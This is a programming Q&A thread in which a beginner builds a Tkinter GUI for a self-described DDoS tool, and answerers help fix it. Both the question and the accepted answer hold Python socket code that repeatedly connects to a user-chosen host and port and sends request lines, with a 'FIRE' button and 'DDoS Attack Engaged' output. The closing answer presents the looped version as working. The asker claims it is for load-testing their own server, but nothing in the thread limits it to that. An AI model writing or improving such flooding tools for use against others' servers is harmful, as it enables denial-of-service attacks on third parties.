# Tkinter button does not what it should

Tags: python, tkinter

I'm quite new to Python and just started to work myself into Tkinter. I started on creating a little GUI for a DDoS tool (since it doesn't need much input etc.). So far the GUI and everything works fine, but as soon as i try to "Fire" the attack it just fails. I can't seem to find the error myself. Any help will be appreciated :)

```py
import time, socket, os, sys, string
from Tkinter import *

root = Tk()
root.title("DDoS")
m = StringVar()
h = StringVar()
p = StringVar()
c = IntVar()


# ***** Text *****
l1 = Label(root, text="Specify Message to send")
l2 = Label(root, text="Specify Host Url")
l3 = Label(root, text="Specify port (usually 80)")
l4 = Label(root, text="Specify amount of attacks")

l1.grid(row=0, sticky=W)
l2.grid(row=1, sticky=W)
l3.grid(row=2, sticky=W)
l4.grid(row=3, sticky=W)

# ***** Input Boxes *****
e1 = Entry(root, textvariable=m)
e2 = Entry(root, textvariable=h)
e3 = Entry(root, textvariable=p)
e4 = Entry(root, textvariable=c)

e1.grid(row=0, column=1)
e2.grid(row=1, column=1)
e3.grid(row=2, column=1)
e4.grid(row=3, column=1)

e3.insert(0, "80")

# ***** grab Input & convert *****
message = e1.get()
host = e2.get()
port = int(e3.get())
conn = int(e4.get())

ip = socket.gethostbyname( host )



def dos():
    ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        ddos.connect((ip, port))
        ddos.send("GET /%s HTTP/1.1\r\n" % message)
        ddos.sendto("GET /%s HTTP/1.1\r\n" % message, (ip, port))
        ddos.send("GET /%s HTTP/1.1\r\n" % message)
    except socket.error, msg:
        print("|[Connection Failed]|")
    print ("|[DDoS Attack Engaged]|")
    ddos.close()

for i in xrange(conn):
    dos()

#FIRE
b = Button(root, text="FIRE", bg='green', command=dos)
b.grid(row=4, column=1)



root.mainloop()
```

Comment: Define "just fails". Also, please only use your programming powers for good.

Comment: what do you mean by define just fails?    It is for good, i wanted to use it to test my server load handling.(maybe i should've added that in the description)

Comment: I mean, how do you know your program isn't working? Does it not do anything when you press the button? Does it hang? Does it terminate prematurely? Does it print an exception and stack trace? Does it print "|[Connection Failed]|"? Does it make your computer reboot?

Comment: Well it prints out "|[Connection Failed]|" and "|[DDoS Attack Engaged]|" at the sime time once, while it normally just should print out "|[DDoS Attack Engaged]|" in the console for every connection made.

Comment: Do the `.get()` calls in the `dos()` not outside it.

Comment: You may get useful diagnostic information if you do `print(msg)` within the `except` block. Let us know if it says anything interesting.

Comment: after adding the .get()'s to the dos() function i get the error: ddos.send("GET /%s HTTP/1.1\r\n" % message) (arrow pointing to ddos.) Syntax.Error : invalid syntax.                                                                                                      for the msg : [Errno 10049] The requested address is invald in this context.

Comment: Sounds like the contents of the `e1` Entry box wasn't a valid address at the time the button was clicked.

Comment: I just removed the message for testing sake. Now it seems to work fine, except that after the button press it doesn't loop, it only issues 1 attack per click. Guess i have to use the for-loop as command for the button b ?

Answer (score 0):

The problem is that you are calling `e1.get()` before the user has the ability to enter any data. That call only gets the current value, and the current value is empty when the GUI first starts up.

You need to make that call and the other calls to `.get()` inside your `dos` function, so that you get the value as of the time when they click the button.

Comment: just did so, it works now to the point that it issues the dos command, but only once, it seems the for-loop gets totally ignored.

Answer (score 0):

works perfectly now, changed the for loop into a function. Thx for all the help.

```py
message = "test"
ip = socket.gethostbyname(e2.get())
def dos():
    ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        ddos.connect((e2.get(), int(e3.get())))
        ddos.send( message )
        ddos.sendto( message, (ip, int(e3.get()) ))
        ddos.send( message )
    except socket.error, msg:
        print("|[Connection Failed] |")
    print ( "|[DDoS Attack Engaged] |")
    ddos.close()

def attack():
    for i in xrange(int(e4.get())):
        dos()

#FIRE
b = Button(root, text="FIRE", bg='green', command=attack)
b.grid(row=4, column=1)



root.mainloop()
```